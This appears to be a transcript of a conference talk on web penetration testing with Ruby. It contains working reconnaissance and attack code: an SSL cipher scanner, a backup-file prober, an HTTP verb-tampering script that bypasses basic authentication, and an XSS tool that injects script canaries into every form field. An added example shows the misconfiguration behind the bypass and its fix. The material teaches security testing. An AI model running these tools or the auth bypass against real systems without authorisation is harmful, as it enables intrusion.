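# and still identifies the server when the banner has been removed.
def fingerprint(raw)
  parsed = parse_response(raw)
  server = parsed[:headers].find { |name, _| name.casecmp?("Server") }
  product, version = server.to_a.last.to_s.split("/", 2)
  { product: product, version: version,
    header_order: parsed[:headers].map(&:first) }
end

# Defender check: does this response disclose a product version?
def version_disclosed?(raw)
  !fingerprint(raw)[:version].nil?
end
```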
  • 19. SSL Testing
    Evaluate an SSL connection for:
    • protocols the server supports
    • cipher length
    • certificate key length

    $ gem install ciphersurfer
    $ ciphersurfer www.gmail.com
    Evaluating secure communication with www.gmail.com:443
    Overall evaluation : B (76.5)
    Protocol support : ooooooooooooooooooooooooooooooooooooooooooooooooooooooo (55)
    Key exchange : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (80)
    Cipher strength : oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo (90)
  • 20. SSL Testing

    # for every protocol version, collect the ciphers the server accepts
    protocol_version.each do |version|
      s = Ciphersurfer::Scanner.new({:host=>host, :port=>port, :proto=>version})
      s.go
      if (s.ok_ciphers.size != 0)
        supported_protocols << version
        cipher_bits = cipher_bits | s.ok_bits
        ciphers = ciphers | s.ok_ciphers
      end
    end

    # Ciphersurfer::Scanner#go: offer the protocol's ciphers one at a time
    def go
      context=OpenSSL::SSL::SSLContext.new(@proto)
      cipher_set = context.ciphers
      cipher_set.each do |cipher_name, cipher_version, bits, algorithm_bits|
        request = Net::HTTP.new(@host, @port)
        request.use_ssl = true
        request.verify_mode = OpenSSL::SSL::VERIFY_NONE
        request.ciphers= cipher_name
        begin
          response = request.get("/")
          @ok_bits << bits
          @ok_ciphers << cipher_name
        rescue OpenSSL::SSL::SSLError => e
          # Quietly discard SSLErrors, really I don't care if the cipher has
          # not been accepted
        rescue
          # Quietly discard all other errors... you must perform all error
          # checks in the calling program
        end
      end
    end
  • 22. Check for backup files
    Crawl the web site and append file extensions to your GETs.

    require 'anemone'
    require 'httpclient'

    h=HTTPClient.new()
    Anemone.crawl(ARGV[0]) do |anemone|
      anemone.on_every_page do |page|
        response = h.get(page.url)
        puts "Original: #{page.url}: #{response.code}"
        # drop any ;-separated path parameter before appending the suffix
        base = page.url.to_s.split(";")[0]
        { "BAK" => ".bak", "OLD" => ".old", "~" => "~" }.each do |label, suffix|
          response = h.get(base + suffix)
          puts "#{label}: #{base + suffix}: #{response.code}"
        end
      end
    end
  • 24. Bypass
    A case study for a PHP 5.3 application using basic auth: with a tampered HTTP verb you can access protected URLs.

    require 'net/http'

    # Create a custom HTTP verb
    class Dammi < Net::HTTPRequest
      METHOD = "DAMMI"
      REQUEST_HAS_BODY = false
      RESPONSE_HAS_BODY = true
    end

    http = Net::HTTP.new('www.mytarget.nonexistent', 80)
    # Make the request
    r_a = http.request(Dammi.new("/backend/index.php"))
    puts r_a.body
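An added example, not from the deck: the server-side view of this bypass as two Rack-style middlewares in plain Ruby (no rack gem needed). PerMethodAuth models the misconfiguration, where credentials are demanded only for the verbs on a list; StrictMethods is the hardened form that answers 405 to any verb the application does not serve. Class and method names are this example's own.

```ruby
# Added example, not from the deck. Two Rack-style middlewares (a Rack app is
# any object with call(env) returning [status, headers, body]).

# The weak setting: authentication tied to a list of verbs. GET and POST are
# challenged, so an unknown verb such as DAMMI reaches the backend unauthenticated.
class PerMethodAuth
  def initialize(app)
    @app = app
  end

  def call(env)
    if %w[GET POST].include?(env["REQUEST_METHOD"]) && env["HTTP_AUTHORIZATION"].nil?
      return [401, { "WWW-Authenticate" => 'Basic realm="backend"' }, []]
    end
    @app.call(env)
  end
end

# The fix: an allow list of the methods the application really serves,
# answered with 405 before any later, verb-dependent check can be skipped.
# The list must not be wider than the set of verbs the auth check covers
# (HEAD is deliberately absent here because PerMethodAuth ignores it).
class StrictMethods
  def initialize(app, allowed: %w[GET POST])
    @app = app
    @allowed = allowed
  end

  def call(env)
    verb = env["REQUEST_METHOD"].to_s.upcase
    unless @allowed.include?(verb)
      return [405, { "Allow" => @allowed.join(", ") }, ["Method Not Allowed\n"]]
    end
    @app.call(env)
  end
end

# Stand-in for the protected /backend/index.php of the slide.
BACKEND = ->(_env) { [200, { "Content-Type" => "text/plain" }, ["backend\n"]] }

VULNERABLE = PerMethodAuth.new(BACKEND)
HARDENED   = StrictMethods.new(PerMethodAuth.new(BACKEND))

# Status code returned to an unauthenticated request with the given verb.
def status_for(stack, verb)
  env = { "REQUEST_METHOD" => verb, "PATH_INFO" => "/backend/index.php" }
  stack.call(env).first
end
```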
  • 25. Cross site scripting
    Executing arbitrary JavaScript code on the client side by submitting a crafted parameter on a web form.
  • 26. Cross site scripting

    $ gem install cross
    $ cross http://www.yourtarget.com

    require 'mechanize'
    require 'singleton'
    require 'logger'

    module Cross
      # Engine is the cross class using Mechanize to inject canary and check for
      # output
      class Engine
        include Singleton
        attr_reader :agent

        # Starts the engine
        def start
          @agent = Mechanize.new {|a| a.log = Logger.new("cross.log")}
          @agent.user_agent_alias = 'Mac Safari'
        end

        # fills every field of every form with the canary and looks for it,
        # unescaped, among the <script> elements of the response
        def inject(url)
          found = false
          page = @agent.get(url)
          page.forms.each do |f|
            f.fields.each do |ff|
              ff.value = "<script>alert('cross canary');</script>"
            end
            pp = @agent.submit(f)
            scripts = pp.search("//script")
            scripts.each do |sc|
              if sc.children.text == "alert('cross canary');"
                found = true
              end
            end
          end
          found
        end
      end
    end
  • 27. Cross site scripting

    #!/usr/bin/env ruby
    $LOAD_PATH.unshift(File.expand_path(File.dirname(__FILE__) + '/../lib'))
    require 'mechanize'
    require 'ap'
    require 'logger'
    require 'cross'

    host = Cross::Host.new(ARGV[0])
    ap "cross " + Cross::Version.version[:string] + " (C) 2011 - thesp0nge"
    ap "target: " + host.host
    engine = Cross::Engine.instance
    engine.start
    if engine.inject(ARGV[0])
      ap "Canary found in output page. Suspected XSS"
    end

    It doesn’t work with iframe apps :-(
  • 29. What we learnt
    • Don’t trust your users
    • “Security through obscurity” is EVIL
    • Testing for security issues is a mandatory step before deploy
    • HTTPS won’t save you from XSS or SQL Injections
  • 30. Some links before we
    http://armoredcode.com/blog/categories/pentest-with-ruby/
    https://gist.github.com/2935464 (gist for anemone crawling demo)
    https://github.com/thesp0nge/links
    https://github.com/thesp0nge/ciphersurfer
    https://github.com/thesp0nge/enchant
    https://github.com/thesp0nge/cross
    http://www.owasp.org
    http://ronin-ruby.github.com/
    https://github.com/rapid7/metasploit-framework

  • 31. Questions?

  • 32. Thank you!

Editor's Notes

  3. Why choose ruby? Mainly for its great networking API supporting HTTP natively and having a powerful regular expression engine (>= 1.9). Yeah, it is cool too.
  4. DISCLAIMER
  5. Change your mindset
  6. A small recap on application security. Focus will be on discovery, information gathering, ssl, xss and sql injections
  7. Leverage your attack surface... what to look for?
  8. robots.txt
  9. robots.txt
  10. links -r http://www.corriere.it
  11. Crawling a website
  12. ruby crawl.rb -1 http://localhost:8080/
  13. Browsing with a transparent proxy
  14. casper code highlight
  15. ruby -I lib bin/casper "" 8008
  16. bruteforcing using enchant
  17. ruby -I lib bin/enchant localhost:8080
  18. wapf... fingerprint using MD5 applied to static files common to frameworks
  19. ciphersurfer and SSL Testing
  20. ciphersurfer highlight
  21. ruby -I lib bin/ciphersurfer www.facebook.com
  22. The importance of checking for backup files
  23. ruby crawl.rb -2 http://localhost:8080/
  24. Bypassing auth for an old, poorly written PHP app protected with basic auth and with poor configuration
  25. What XSS is
  26. cross code highlight
  27. again cross highlight
  28. ruby -I lib bin/cross "http://localhost:8080/examples/xss_me.jsp"
  29. what we learnt
  30. links